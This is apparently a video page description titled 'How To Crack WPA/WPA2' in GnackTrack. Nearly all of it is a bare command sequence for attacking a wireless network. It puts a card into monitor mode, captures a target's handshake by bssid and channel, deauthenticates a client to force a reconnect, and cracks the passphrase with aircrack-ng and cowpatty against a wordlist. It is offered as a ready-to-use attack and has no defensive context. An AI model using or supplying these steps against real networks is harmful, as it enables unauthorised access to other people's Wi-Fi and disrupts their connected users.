How To Crack WPA/WPA2 in GnackTrack / Aircrack-ng & Cowpatty HD
How To Crack WPA/WPA2 in GnackTrack / Aircrack-ng & Cowpatty WPA-PSK [TKIP] Tho ist the same method for WPA/WPA2 PSK (TKIP or AES/CCMP) ----------- airmon-ng start wlan0 airodump-ng mon0 airodump-ng --channel 6 --write output --bssid xxxxxxx mon0 aireplay-ng --deauth 1 -a xxxxxxx -c xxxxxxx mon0 ----------- aircrack-ng output-01.cap -w /pentest/passwords/wordlists/gnacktrack.lst cowpatty -s ESSID -r output-01.cap -f /pentest/passwords/wordlists/gnacktrack.lst
Похожие видео
Показать еще